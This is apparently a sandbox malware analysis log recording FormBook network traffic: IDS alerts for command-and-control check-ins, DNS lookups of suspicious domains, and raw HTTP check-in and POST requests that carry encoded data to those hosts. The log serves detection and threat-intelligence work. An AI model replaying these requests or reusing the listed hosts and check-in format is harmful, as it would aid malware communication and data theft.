                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50064 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50065 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50067 -> 47.83.1.90:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50057 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50054 -> 3.33.130.190:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50041 -> 104.21.112.1:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50048 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50048 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50032 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50032 -> 188.114.96.3:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49901 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:50052 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:50052 -> 13.248.169.48:80
                Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:50063 -> 3.33.130.190:80
                Source: DNS query: www.sidang.xyz
                Source: DNS query: www.hastanhizmetleri.xyz
                Source: DNS query: www.noudge.xyz
                Source: DNS query: www.031235045.xyz
                Source: DNS query: www.vaishnavi.xyz
                Source: DNS query: www.dualbitcoin.xyz
                Source: DNS query: www.gelida.xyz
                Source: DNS query: www.minimalbtc.xyz
                Source: Joe Sandbox View | IP Address: 144.76.229.203
                Source: Joe Sandbox View | IP Address: 13.248.169.48
                Source: Joe Sandbox View | ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
                Source: Joe Sandbox View | ASN Name: HETZNER-ASDE
                Source: Joe Sandbox View | ASN Name: AMAZON-02US
                Source: Joe Sandbox View | ASN Name: ACPCA
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global traffic | HTTP traffic detected: GET /cwaj/?Xxh=gDML3d2pDfBtJ2ap&_LJl=NmUfxQrz0WFQu6e1vB+SoVcrqvU6cnIrCagHYkSMqQArAACBkiI71BEuNA1edrIRm5QCdE2XawPBlU7vbp4PweTAT8mdIp68RMMynO1wCIcNWpVCCEAtjBA= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.isoemarket.shop
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /6wi0/?_LJl=MUmOKOjVbEpAXFm5ojsL9MCXDP9ANRuc6TEVXWaXYAj73tUw1MgyAUdmulGWvnB4v8QQA07PGVxg24rIHlu1/xJx5dTIT8IpYtsk5wSD1aqos/TmJOCCeJ0=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.vsilmhxj.tokyo
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /0j68/?Xxh=gDML3d2pDfBtJ2ap&_LJl=T5zk9dsLIunu/n4oUlTP4gZAP3+R2x3htRkOTnRpQURxiR8cfQXlWi1cANaqvjchzXTdjhRSt4g8/GNhVjyhXyM4NL1XTdd6dYFaSC5qk+IUWyyNFlngcmg= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.sidang.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /yw3f/?_LJl=EQSrhtPuDg3pW577166WlghPt5vxdDRHL6EaWebBO0TpTRxDo7/bTIB2xez8ddqkXF2LbmtEbkI7kZgVxT7fJzZJcMdh0GAOTlQVWNMsUxRrLieYgxhZ8N4=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.hastanhizmetleri.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /n00b/?Xxh=gDML3d2pDfBtJ2ap&_LJl=iQ+QS1lo6uvIGGPPnanLgqLOpzj0MSJo2wOeU9EorhnMg6Dg3MakUEzOvHEw8ZD+mNMFq81MdilwNKpwrucL6Vt2oH5zaPln9XkZ0girAKVPZuHrKLR4370= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.noudge.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /x35a/?_LJl=dWY7lI8HDhihY6JLbiucZJJQKNpznLVoIrDJkGpZj0gBIjegzPnOseQLWLFbNyUuWYMzRp0ci/LZueoJN+9YhClW67l+oM6F2/voW1mL842688cYRszVxsk=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.031235045.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /2p9f/?Xxh=gDML3d2pDfBtJ2ap&_LJl=kR4sXqxEqdCKxcd0uvMHrofbI2HL5Kt3h13R7fH3Y7T7Jml87ikCWT0lH6J8YdG1qFj+UvZ1zE/9YSWRQ7SaHH6DrYg9PJGFFvOYaHrPaLHfrFbZtFeZLTE= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.fkrvhaupjtc.info
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /a255/?_LJl=71qW4Nx4dt5SfVYd8QHHJQDXud1LCbncD1lK2mKt9LCJZ4STjm65LcjSJQ2HTSiE+Z7WdPOkz4Dc0w/KNAm24ha5nae0dSQhsEEHHa5uibasovGJfCRdP1c=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.vintageprod.net
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /lfjm/?Xxh=gDML3d2pDfBtJ2ap&_LJl=SYdBkJci5v39nf4QZCybwyWUgKKjg6ESvGXaIroc+h3NqMcJAPR48Il0IqREyzliai9XD9lgyxpgfQFl8d4whuH5wPCgGAw3FPtG4/TX/jHJqkuOwGey5Qs= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.vaishnavi.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /6m32/?_LJl=Va/we0xl003DQZZ5hAF+FceFrKluVme+bUy9vd5w4QTsm7kbnVGOKZ/fShoalOeRjCVBwCWzFLQL56uWIkSal+JXDav07SiGR8OPejcjaHIuPeZ4gX1wkdw=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.rbopisalive.cyou
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /o4w6/?_LJl=6lKfvrTTzjNBleesXlgVDxeyIVwfagVQ3seX6l6NteG/OnLU2Wkj2ZjnFUXwTNDzYGydJHdrz8GXGpxHCC5uJjTTCWCsRzSQoauigMKRyt96Bc+a1uKDTCk=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.dualbitcoin.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /3xxf/?_LJl=nI71gAHwA2y1h+Hcmqsi9fVt7r47U8qUWZbbeDVE2zDMFU7E/I5Jnbhdlga2X4Rk93x69PX2UbpyE4MrGgdnarluiV+UTVJPy7Mb60xp/d/5aa/0q7/3Ews=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.gelida.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /fhz4/?Xxh=gDML3d2pDfBtJ2ap&_LJl=y3wcV3BcSnsNbAsjCJpxQAmYegvJUPbqBMCwqxxOuE6l68kPpv6Jklxr3hJ8vTcwN6tD2iIaYUe19tgZRNYh7MR51dizai4/Q3yoeaZckVb96npVqAJAizw= HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.spacewalker.app
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /x1ok/?_LJl=59KYOEoUMDOvAyQxzYTgRKuVCDXA6kmZBotswWz2AJMcdqWyh/wiqqHIk/e5YCUGKcb3PS7ii7ge7s5ywJ4YDwvSVacKXJ832k4QCuc2X3Hjm8V1yeDqpLI=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.minimalbtc.xyz
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /aimx/?_LJl=o7riQ79rwVwArQ5KlOVSty9ICz1QCTYnNKCrwKHViq0sTyAO0WThqGxq0+hT6gbNX7VYsYGamaiPTzh1Mo5mk6YUXNxkuftPs+bFWqicrE/EZYMMCkfU1V4=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.7gcapital.club
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | HTTP traffic detected: GET /t9cz/?_LJl=FkCKHETtaWCTj8DUTOS8ugzfwWtFiq+fJwPrhGD4NHB44S2i/ROBOfckrHQcQwaPZXVzuDEWosjqiur2WPMw4tj1AOUwwqx1aTVxxTJGW1I9zxBwrI+G2M0=&Xxh=gDML3d2pDfBtJ2ap HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Language: en-US,en;q=0.9
                    Host: www.tkloqr.info
                    Connection: close
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                Source: global traffic | DNS traffic detected: DNS query: www.isoemarket.shop
                Source: global traffic | DNS traffic detected: DNS query: www.vsilmhxj.tokyo
                Source: global traffic | DNS traffic detected: DNS query: www.sidang.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.hastanhizmetleri.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.noudge.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.031235045.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.fkrvhaupjtc.info
                Source: global traffic | DNS traffic detected: DNS query: www.vintageprod.net
                Source: global traffic | DNS traffic detected: DNS query: www.vaishnavi.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.rbopisalive.cyou
                Source: global traffic | DNS traffic detected: DNS query: www.dualbitcoin.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.gelida.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.spacewalker.app
                Source: global traffic | DNS traffic detected: DNS query: www.minimalbtc.xyz
                Source: global traffic | DNS traffic detected: DNS query: www.7gcapital.club
                Source: global traffic | DNS traffic detected: DNS query: www.tkloqr.info
                Source: unknown | HTTP traffic detected: POST /6wi0/ HTTP/1.1
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Encoding: gzip, deflate, br
                    Accept-Language: en-US,en;q=0.9
                    Host: www.vsilmhxj.tokyo
                    Origin: http://www.vsilmhxj.tokyo
                    Connection: close
                    Content-Length: 201
                    Content-Type: application/x-www-form-urlencoded
                    Cache-Control: max-age=0
                    Referer: http://www.vsilmhxj.tokyo/6wi0/
                    User-Agent: Mozilla/5.0 (iPad; CPU OS 6_0_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A550 Safari/8536.25
                    Data Raw: 5f 4c 4a 6c 3d 42 57 4f 75 4a 37 44 6b 55 57 46 43 57 30 76 2b 6a 51 63 50 6f 63 6a 78 49 75 34 62 41 43 47 30 72 51 51 6c 62 57 32 69 65 6a 50 77 37 4c 6f 43 33 37 6f 4c 44 30 70 6e 30 78 66 31 6a 6d 5a 6d 70 66 74 48 45 67 50 55 54 54 70 6a 32 4a 33 57 47 6c 79 31 76 6d 35 49 6e 64 50 53 55 35 55 41 56 4f 77 34 7a 57 54 30 34 38 75 51 6d 73 2f 6f 4f 5a 75 39 65 4e 4a 73 46 49 54 59 2f 63 41 35 48 77 43 67 36 39 7a 4e 73 57 58 76 6b 79 43 61 76 73 6d 45 67 4c 6b 47 46 77 64 74 76 74 79 38 77 63 39 4b 68 35 69 4a 43 71 64 2b 55 32 4c 64 47 35 70 70 79 77 6e 63 53 62 6c 74 76 4e 4a 6d 6d 67 3d 3d
                    Data Ascii: _LJl=BWOuJ7DkUWFCW0v+jQcPocjxIu4bACG0rQQlbW2iejPw7LoC37oLD0pn0xf1jmZmpftHEgPUTTpj2J3WGly1vm5IndPSU5UAVOw4zWT048uQms/oOZu9eNJsFITY/cA5HwCg69zNsWXvkyCavsmEgLkGFwdtvty8wc9Kh5iJCqd+U2LdG5ppywncSbltvNJmmg==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Feb 2025 04:52:38 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 19 Feb 2025 04:52:41 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 
74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:52:43 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:52:46 GMT | Server: Apache | Content-Length: 16052 | Connection: close | Content-Type: text/html; charset=utf-8
                Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Wed, 19 Feb 2025 04:52:52 GMT | Server: Apache | Content-Length: 315 | Connection: close | Content-Type: text/html; charset=iso-8859-1 | Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
